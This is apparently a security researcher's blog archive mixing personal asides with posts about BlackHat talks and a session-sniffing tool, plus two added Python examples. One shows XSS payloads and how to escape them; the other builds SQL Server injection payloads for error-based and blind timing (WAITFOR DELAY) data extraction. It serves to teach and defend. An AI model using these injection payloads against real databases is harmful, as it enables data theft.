Fun

It begs the question…

I can't recall who said it in yesterday's meeting, but my response is simple: http://begthequestion.info/

MTBF and Light Bulbs..

Some of you will know that I finally moved out of the shoe box I lived in for 6 years and into a house (about 3 months ago). Since then I have replaced 3 different light bulbs in different places in the house.. Now this made me start thinking.. Surely when the house was new, all the bulbs were fitted brand new.. Now some sections of the house light a series of 4 or 6 bulbs at once, yet there appears to be no link at all between “sibling” bulbs and their life-span..

Ok.. Now this is pretty cool…

For all those guys who usually scoff at CSI / police movies where the detective shouts “enhance image” or “remove that person”, you have to admit that life does indeed imitate art.. (Click image or here) Pretty neat…

2 Un-related thoughts.. on Echelon and the recent Skype Outage..

I suspect somewhere there exist cardinal rules of blogging which would state that using a single post to make 2 completely un-related posts is a no-no.. I will now promptly ignore it to push out 2 random thoughts that came up.. Echelon and Echelon spam.. While watching the Bourne Ultimatum the other night the usual “echelon”-esque scene played out.. Guy on phone says keyword.. pan to NSA/CIA-type building.. computer-drone-type person screams something like “we have a hot one”..

On hamsters, Escaping, Escaping of Hamsters and the Lack of escaping in Hamster…

OK.. So as I mentioned before, I saw Robert Graham from Erratasec demo hamster live on stage and wondered if hamster was doing useful input/output sanitization.. If it wasn't, he was setting himself up for a pop-up that read “owned on stage” or, worse, a redirect to tubgirl.. He didn't get owned on stage, which suggested that either the crowd was really well behaved or the tool was doing some tidying up, so I decided to wait till I got home to check..
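The worry in that post is a general one for any sniffer with a web UI: every hostname, path and cookie it captures is attacker-controlled input, and the UI renders it as HTML. The example below is added here and is not hamster's code; the capture entries are constructed, and the third one is the sort of thing a hostile client on a conference network would send to pop a box in a viewer that does not escape.

```python
"""
Added example (not hamster's own code): rendering sniffed session data into an
HTML view safely. Anyone on the same network controls every byte that ends up
in the tool's page, so the sniffer itself becomes an XSS target unless captured
values are escaped as text and as URLs before they reach the markup.
"""
import html
from typing import Callable, Dict, List
from urllib.parse import quote

# Constructed sample capture. The third entry carries hostile markup in both
# the path and the cookie, which is exactly what a naive viewer would render.
CAPTURED: List[Dict[str, str]] = [
    {"host": "mail.example.com", "path": "/inbox", "cookie": "sid=abc123"},
    {"host": "shop.example.com", "path": "/cart?id=7", "cookie": "cart=7; tok=x"},
    {"host": "evil.example.com",
     "path": "/\"><script>alert('owned on stage')</script>",
     "cookie": "<img src=x onerror=alert(1)>"},
]


def render_row_unsafe(entry: Dict[str, str]) -> str:
    """The naive version: captured bytes go straight into the markup."""
    return (f"<tr><td>{entry['host']}</td>"
            f"<td><a href=\"http://{entry['host']}{entry['path']}\">"
            f"{entry['path']}</a></td><td>{entry['cookie']}</td></tr>")


def render_row_safe(entry: Dict[str, str]) -> str:
    """Escape for the context each value lands in: text nodes get HTML
    escaping; the href is a URL inside an attribute, so it is percent-encoded
    first and then attribute-escaped."""
    host = html.escape(entry["host"], quote=True)
    path_text = html.escape(entry["path"], quote=True)
    href = "http://" + quote(entry["host"], safe="") + quote(entry["path"], safe="/?=&")
    href = html.escape(href, quote=True)
    cookie = html.escape(entry["cookie"], quote=True)
    return (f"<tr><td>{host}</td><td><a href=\"{href}\">{path_text}</a></td>"
            f"<td>{cookie}</td></tr>")


def render_table(entries: List[Dict[str, str]], safe: bool = True) -> str:
    """Build the whole view with either renderer; `safe=False` reproduces the
    'owned on stage' failure mode."""
    rows: Callable[[Dict[str, str]], str] = render_row_safe if safe else render_row_unsafe
    return "<table>" + "".join(rows(e) for e in entries) + "</table>"


def contains_live_markup(page: str) -> bool:
    """Cheap check used here only to show the difference: does any raw tag
    from the captured data survive into the page?"""
    return "<script>" in page or "<img " in page


if __name__ == "__main__":
    print("unsafe view executes captured markup:", contains_live_markup(render_table(CAPTURED, safe=False)))
    print("safe view executes captured markup:  ", contains_live_markup(render_table(CAPTURED, safe=True)))
```

The point of escaping per context (text node versus URL attribute) is that a single `html.escape` on the href would still let a captured path break out of the URL; percent-encoding it first keeps it a URL, and attribute-escaping afterwards keeps it inside the attribute.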

Late BlackHat Update..

ok.. so I'm in my room finally catching up on sleep (or will be in a few minutes) while most people are finishing Microsoft's booze at the PURE Microsoft party.. BlackHat is over, which means tomorrow we are off to the Riviera for Defcon.. Marco and I got a lot of positive feedback from our talk, including from guys like Rob Auger of WASC fame and Andrew Bortz, who we quote in our paper, so it was pretty cool.. all our demos went off smoothly (one of them used JavaScript (and timing) to create a distributed brute-forcing tool, which had every opportunity to go south) so we were happy..

BlackHat Progress Report

(always wanted to say that!) 2 SensePost training sessions are over, and as I type the weekday sessions are at about 50%. Feedback so far has been pretty cool and it's been fun to meet new people / bump into some old friends.. The next “biggie” on the horizon is Wednesday's talk.. We have had a fair bit of interest so far and even though the slot has some stiff competition it seems like all will be well :). The talk should be interesting to developers, pen-testers and even just people with a vague interest in seeing cool stuff.. Marco has been adding functionality to “squeeza” like a demon and as it stands it's probably the only SQL injection tool I know of that allows file downloads, arbitrary SQL queries and database mining, all purely in T-SQL, over a variety of transport channels (DNS, error messages, timing). We will post the link to it for download just before we talk..
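For readers who have not seen these channels before, here is what two of the three (error messages and timing) look like against SQL Server. This is an added illustration, not squeeza's code: the vulnerable query template, the subquery and the server error text are constructed here (the error wording mirrors SQL Server's conversion-error message), and the timing oracle is a stand-in that evaluates the comparison the payload would make, so the extraction logic runs offline.

```python
"""
Added example, not squeeza's own code: two T-SQL exfiltration channels.
  * error channel: CONVERT(int, <string>) fails and SQL Server quotes the
    offending value inside the error message, so one request leaks one value.
  * timing channel: a conditional WAITFOR DELAY turns one comparison into one
    bit of timing, and a binary search over the character value recovers it.
"""
import re
from typing import Callable

# Hypothetical injectable statement; the attacker controls `inj`.
QUERY_TEMPLATE = "SELECT name FROM products WHERE id = '{inj}'"


def error_channel_payload(subquery: str) -> str:
    """Force a conversion error that carries the subquery's result back to us."""
    return f"' AND 1=CONVERT(int, ({subquery}))--"


# Constructed to match SQL Server's wording for a failed string-to-int convert.
ERROR_RE = re.compile(
    r"Conversion failed when converting the (?:n?varchar) value '(.*?)' to data type int\.")


def parse_error_channel(error_text: str):
    """Pull the leaked value back out of the server's error message."""
    m = ERROR_RE.search(error_text)
    return m.group(1) if m else None


def timing_channel_payload(subquery: str, pos: int, threshold: int, delay: str = "0:0:5") -> str:
    """One blind probe: the server sleeps iff the character at `pos` (1-based)
    has an ASCII value greater than `threshold`."""
    return (f"'; IF (ASCII(SUBSTRING(({subquery}),{pos},1)) > {threshold}) "
            f"WAITFOR DELAY '{delay}'--")


def extract_char_by_timing(oracle: Callable[[str], bool], subquery: str, pos: int) -> str:
    """Binary search over 7-bit ASCII. `oracle(payload)` returns True when the
    request was slow, i.e. the WAITFOR fired. Seven probes per character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(timing_channel_payload(subquery, pos, mid)):
            lo = mid + 1          # character is above mid
        else:
            hi = mid              # character is at or below mid
    return chr(lo)


def extract_by_timing(oracle: Callable[[str], bool], subquery: str, length: int) -> str:
    return "".join(extract_char_by_timing(oracle, subquery, i) for i in range(1, length + 1))


def simulated_timing_oracle(secret: str) -> Callable[[str], bool]:
    """Constructed stand-in for a real server: parses the position and
    threshold out of the payload and answers as the database would."""
    pattern = re.compile(r"SUBSTRING\(\(.*?\),(\d+),1\)\) > (\d+)\)")

    def oracle(payload: str) -> bool:
        m = pattern.search(payload)
        pos, threshold = int(m.group(1)), int(m.group(2))
        return ord(secret[pos - 1]) > threshold
    return oracle


if __name__ == "__main__":
    sub = "SELECT TOP 1 name FROM master..sysdatabases"
    print(QUERY_TEMPLATE.format(inj=error_channel_payload(sub)))
    # Constructed server response to that payload:
    err = "Conversion failed when converting the nvarchar value 'master' to data type int."
    print("error channel leaked:", parse_error_channel(err))
    print("timing channel leaked:", extract_by_timing(simulated_timing_oracle("master"), sub, 6))
```

The error channel is one round trip per value but needs the error text to reach the client; the timing channel works when nothing is echoed at all, at the cost of about seven requests per character plus the delay on every positive probe.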

-sigh- little things, little minds…

Deels stumbled on www.simpsonizeme.com to give me mh, the Springfield edition.. Combine it with your intranet mug-shots, and it could give you hours of lost productivity..

Probably the best book dedication i have ever seen….

Richard Bejtlich didn't give the pre-release a glowing review, but I know at least a few people waiting eagerly to get their hands on the new “Fuzzing: Brute Force Vulnerability Discovery” by Michael Sutton, Adam Greene, and Pedram Amini. Pedram is the mastermind behind PaiMei and started OpenRCE, but his last blog post points to the book's dedication page, and it probably makes the book worth buying all on its own.. outstanding…

Adventures while moving… (Part II)

Ok.. so we have an outside gate type thing that leads to our garden. Since we would probably get to the gate at random points of the day / week we figured a combination lock would make sense. Now I know that combination locks traditionally have a pretty small keyspace, and have a horrible reputation, so I asked Deels to make sure she got one with at least 4 digits, and had a good name behind it..